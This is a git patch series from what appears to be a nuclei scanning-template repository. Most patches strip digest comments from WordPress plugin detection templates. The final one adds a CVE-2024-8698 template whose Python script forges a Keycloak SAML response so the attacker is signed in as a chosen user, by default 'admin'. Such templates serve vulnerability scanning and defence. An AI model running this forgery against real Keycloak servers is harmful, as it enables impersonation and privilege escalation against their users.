a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ca9863a886f6fee45da73950f2a556865fb28c75e6de9e4b9e3d0ff24d3a97e022100e7bcb1b953bc2a0216f558bf723491c7a66e73cbd083521740d358fbd129a8a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 6f99d1e424..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db39fa3c1ef6e3715c428f32e0e7736ad1eec5ff41488f4644a45d2f121e6ea9022100c86393f475b392e962aefea24c8e549db8ee2f08af6fe277fe3287eb18729b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 248a06d90f..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8513de3e85987c6b240255e85faaaef94a1110e6ffdf4b9feca0913c950c9ec0220335df6967c5c3b02bb6cafeabaa7a88af5ead6e8810bdaab4224e5366fa474fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 872ebf1b7e..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205642fcf05745962840d37c590020e2db0cf49ed541b9db01ca0baaac760e08bc02200a6ca1f6c736138227e4b4ba7cea56c6a5f5cdc40646dc708bdc06ee9998e904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 2585a1bec4..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220798c035f76031c2dd5f217ae48f93ac3ad8ea4752b2cd624cdfc65dd547bd929022068778210a7f5f71bfdad06876c36e79ecb41f0d2612927c39ec1d8af78424913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 96856d63f8..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e514d23f0cdbca43678cf1bb9134bb0ac24bf168e8fce0d00e0d1be78c37e93f022100f1ed05b116b3078568f2dea58b3de77b9dd70fe068f9e44843d1a6ed83d0497d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 047ddef4f1..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100adefee8a6e1054e0ed7cfdeab14f5c0022b73aad549ff2202e278b5b37dcff6a0220411e1c31cc69d42b47504e29e7e5765ac12cf24e2abf341475b195215e9075ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48b25a288c..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce35581a835e6799f5a7fd651769fded5cba2bd130dc57c0cd087fface478d02022059315b9681640a0cbc561072460280a552dc662bd0532fe455adfbf2f900bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 2c2a9708b8..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e77909593ec48ed8560fcb206f0cca301739b93376d82efb03101ac8dcbea3fd02205661124fcc1fdc22c3f9fbca6c89381507d5df0511976f7af27ad9e6879d4e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8402f54abd..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ac220995325f65cc023971ec3e3eb4bb4ce0284347177d0da08c27e593c4bbd0221009f015ef54e2cf26cfdbb78193b94b85593eca80143f2b406ff985b0097b6812d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 52c533345f..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f3710c9cd6f9e16462235698650caf58fa1225dccd3cdf5f9b6c0f8f0c13d79022100facde8a2398dab898c85b9acd9396921047e9413afe1d9fd0104b17cd505204c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index f35986c557..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220669e39c9c4265f5c6f35f4efdbbd20520b405102e036e3e609b06443d69f81280220770cef80de901dc3356732761b96b5bb53f28381f860c56ba0465480245fcfa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 3a78d83019..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b451fc4e9c07f28e11996e75ecfdefd18f4a9003500d5d6ec7a7b229adf80483022100d39258c2bcd767ab3ab6634006c08540c772882eadd3bdeb8e909028f97ff9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index e5161d6877..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011292388ec335f2d0a99ab4357097a9a2a0c5e368cc4c9492dbf4cdb76c28a7502203f28e6cbe65b848bb599b3f250578ae5ae80b9f99a0359d7ae6715d710717c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 460c0ca8eb..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022060a2bd41d8b75efa5ec156faa816c68525015ad673758f48dcb93b667daf351d022026fca6f7cfb4c0f28210ca8b02ccb88a8195acd934738e902c3cab63d43f1302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b336f909e9..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047570350cb482b32df1fd3b49c0715649a9ec9c61e72916e78d226b8de92d718022100cb85012cb11d8b18deb3f7fb79b203800ec55a76ed2cb05b62fad1da6c7241ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 7d30514689..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eaf5145997bdd15325c89a08fad8c801184997c12c5f147e92d4fa81d91a79b302207b20d72455bb7b9140d0a18d0b1cb6efe936fb2f5ee26d319b5a411c89c703b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index cbe1f38a5a..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220458ece5d67a185e113c343a6c933598a31aae607da26681cf8173e14d688a7eb02207378ce88c043c1e1672f958effc5c5130df665e7b6d7f0ace87d0b4ae3b08d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e03f1948fe..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202404cd8406a4facdd86fcf978bdf509a0ba37990f6aa16990256989a922ae9e4022001deee20b4d50ed839c085008ba5e09c0abbc6fec6a62dd0210a9a7ebf1df60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 9f84ad79f9..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220063dafa11e3a491738f0027c4240ea8330587c7d88072f171766c29ec8cc910802205249bdc2a257e064a0253b74a2cd3d786da06ebe4a6621d4831cbcdfea928952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 71b63ac3bc..01a3669132 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072de347295c19c290e12459a790e780afb1716214a9e0360c462ecf26df5f54d022100e898a1500c19f2afb0d89d25cb9f6343b7d21dd3319592749e6ae886e5a4a636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 12a0301c0e..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cafbad04373d68a9d9a9813f532bb2c1742ba0a656c2d6c7117ce2f029e5137022100ac22412db5ec11e4d3fc54ee282975e0d2060629c90e080065a22d6c70bbbaa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 8980c8f18a..dc18db23b1 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d90f2d456e2fff0a2c87817bdcd89ca8bfc0a157d93bc7882b33efea8e4f03ea022100f06d0a3d7b4433a36184e59cd7490be0f30fc15c64c66f6e82ef6d5a18414b7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 8b4b7be9d5..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d632b9483159629dbe984f649c819528c3d3d39f3343ac2104fcb01eaf938f74022076e0fd4eaac55ca4aa8655e628c74196546df2124cd0c9260ee1600e7815e5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index e4eebaee2e..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202229a4508cf3135b6976b09c6670ceccc19332826dcc2ba4ad586ce76115d1c202201161f9977e36c0b652c9723bd29e82a4ca09634fe1a91155316baed8f75074c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 30d30fb164..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c597344c2fbfa7d11498771cd1f987fc6d73d57afb15189794f61e4fe640432d022100f9d6fdaab56c0ea93a9225e6f4b1042f1bc474783b05673503afb340861988e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c3fe1c2366..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017d8bf55b3b97b3ac96f4185d8a8fb07da139d5060a156c5dc6e5581e154baa102200d6e5a2ad9f84133bac590c1916661bbbc8223fc5491798e1aa8d4ec83969188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 63a0a81461..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f35239edd307958c21b8f13a1728c2b075f5b2e440ffb8547c9ef4bae09b4af022100abbfa6a43212b4079ff31106cfc925f5cc4fe6743cb0d8ab3ef4724d0a007c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 7101f6b1e1..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071d75ebb495a0038e42a5f45dea93278bfa46a2985eb20cf38c6bfe57de8d896022100fa4f2f0591b5b084f64ee86548987700afd4d321a337dac7ed80091b3da56553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 938b34d52d..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6a45f62d2ece61b26d5a7a4d91661603f62b232d31fcb70e0e3d463cca0b3e0022004458794d8a14e2c0c1c5e5b2f80255a05f3e510b9e6a8692a19eab8eaa77956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 1836c6a90e..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc9458792ce86ec6f3efc95be3bf19840c3b9a330458e7a2a0ea48149c22e01c022046d225e0cdfad86213c035278322e476839cb3616a18c58751ada0892b175cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e7a91057f7..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dcbc3776723a45b49dee13804d32fd7165f871d2508f28be3aad27246993ced022077d732c67ba97b6d3db0b900da2ea17f5fd00a2a6ff8b798c2f1bf5189fb4abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 3f80a423ff..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a865b1fe7327fd9bda51530c6642781d6ba8efa0e3161288eb5a643f1eb451e022100aba203abaf718e8dd314350d7fc7c3f1b0ffcd02880039c28b57f016f2455b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 6fee4ffa0e..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c9ded49a6fdfa0f339a4058819fba0e9c461890e52191384f7dd88f67d4c8d90221009b3b4815f19519fe05a2f7bd4cd4b871053a760e16f97d84b4892965da6bcf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 514841ac9e..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab9e134e38fa9971dd3d877f5e9ea1bcdfc2f725d31ec2d44db62bf45f88feb802207d0484536598c0580da996769a468dd7ce041c170f4d1c551fcf3206155db412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c1711c1518..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eaa680800cb2fea20ce6c8b609feee07fe313f6f6a37cc1ede502568a178cc6e0221009d686b6bc8721bf2288fc4f1bbf60562dc7656e9f59a50678b7dbb54dba4ad1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index f1a9a9a4d4..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b5946a3a890f63578bdee987a7159c9c2a50e7af021abbc708085087cea95dd02200859393b86c1c84a83784906c0e322c4e7f2a8562ba915e9077c141dc1380d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 58f34428ca..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015ed9aec2cac5d3e0c8e740cda9f0513f7e2a93b3728313970ab416c86e386d3022054449aa43dbfbcd7b03edccb39e7b5d2c3b852980766bf6d54a3b48b85fd8c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 0ca285d5f6..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c10d0bb4b6353d7aa0af266da081c29d6a4f600b7eefdcef0b0059aca611457d02201113b7e5d29594678016f758f8e2f9386647e49b7a7de2a9b61ff31bb5264ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index bb94ccc9f0..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100990d566a7968434ccc3839f5d5027777c0ae1698ae78f19f035b033fd5627c1702207069a145d6393ae255c1915f316535c4738913c5717693f5475313876f1b0820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f83f797325e1e8f0c3df0af316382d844922ab03 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Oct 2024 16:32:13 +0530 Subject: [PATCH 191/218] Create CVE-2024-8698.yaml --- http/cves/2024/CVE-2024-8698.yaml | 109 ++++++++++++++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 http/cves/2024/CVE-2024-8698.yaml diff --git a/http/cves/2024/CVE-2024-8698.yaml b/http/cves/2024/CVE-2024-8698.yaml new file mode 100644 index 0000000000..74aa02a118 --- /dev/null +++ b/http/cves/2024/CVE-2024-8698.yaml @@ -0,0 +1,109 @@ +id: CVE-2024-8698 + +info: + name: Keycloak SAML Core Package Signature Validation Flaw + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-8698 + - https://access.redhat.com/errata/RHSA-2024:6878 + - https://access.redhat.com/errata/RHSA-2024:6879 + - https://access.redhat.com/errata/RHSA-2024:6880 + - https://access.redhat.com/errata/RHSA-2024:6882 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L + cvss-score: 7.7 + cve-id: CVE-2024-8698 + cwe-id: CWE-347 + epss-score: 0.00125 + epss-percentile: 0.47937 + metadata: + verified: true + max-request: 1 + vendor: redhat + product: keycloak + shodan-query: + - http.favicon.hash:"-1105083093" + - http.title:"keycloak" + - http.html:"keycloak" + fofa-query: + - icon_hash=-1105083093 + - body="keycloak" + - title="keycloak" + google-query: intitle:"keycloak" + tags: cve,cve2024,keycloak,redhat + +variables: + AUTH_SESSION_ID_LEGACY: "{{auth_cookie}}" # Cookie of the valid SAMLResponse message + RELAYSTATE: "{{relayState}}" # Relaystate linked to the Cookie + +code: + - engine: + - py + - python3 # requires python to be pre-installed on system running nuclei + source: | + import os + import base64 + import urllib.parse + from lxml import etree + + # Get environment variables + username = b'admin@example.com' + saml_response = os.getenv('SAMLResponse') + username = os.getenv('username') + if not username: + username='admin' + # Decode and parse the SAML response + xml_content = base64.b64decode(urllib.parse.unquote(saml_response)) + parser = etree.XMLParser(remove_blank_text=True) + root = etree.fromstring(xml_content, parser) + + # Define namespaces + namespaces = { + 'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol', + 'saml': 'urn:oasis:names:tc:SAML:2.0:assertion', + 'ds': 'http://www.w3.org/2000/09/xmldsig#' + } + + # Find the element inside the root + response_signature = root.find('.//ds:Signature', namespaces) + if response_signature is not None: + root.remove(response_signature) # Remove the element from the root + + # Find the element (this is the old assertion) + old_ass = root.find('.//saml:Assertion', namespaces) + ass_signode = old_ass.find('./ds:Signature',namespaces) + if ass_signode is not None: + old_ass.remove(ass_signode) + issuer = root.find('.//saml:Issuer', namespaces) + issuer.addnext(ass_signode) + mod_ass = etree.fromstring(etree.tostring(old_ass)) + mod_ass.find('.//saml:NameID',namespaces).text = username + for s in mod_ass.findall('.//saml:AttributeValue',namespaces): + s.text = username + mod_ass.attrib['ID'] = mod_ass.attrib['ID'][:-1] + resp_issuer = root.find('.//samlp:Status', namespaces) + resp_issuer.addnext(mod_ass) + + + modified_saml_response = etree.tostring(root, pretty_print=False, encoding='UTF-8', xml_declaration=False).decode('utf-8') + print(modified_saml_response) + +http: + - raw: + - | + POST /realms/master/broker/saml/endpoint HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: AUTH_SESSION_ID_LEGACY={{AUTH_SESSION_ID_LEGACY}} + + RelayState={{RELAYSTATE}}&SAMLResponse={{urlencode(base64(code_response))}} + + matchers: + - type: dsl + dsl: + - 'status_code == 302' + - 'contains_all(header,"KEYCLOAK_IDENTITY","KEYCLOAK_SESSION")' + condition: and From 8ee68d8d9a989e1886168f0ffaa8e90be408b519 Mon Sep 17 00:00:00 2001 From: 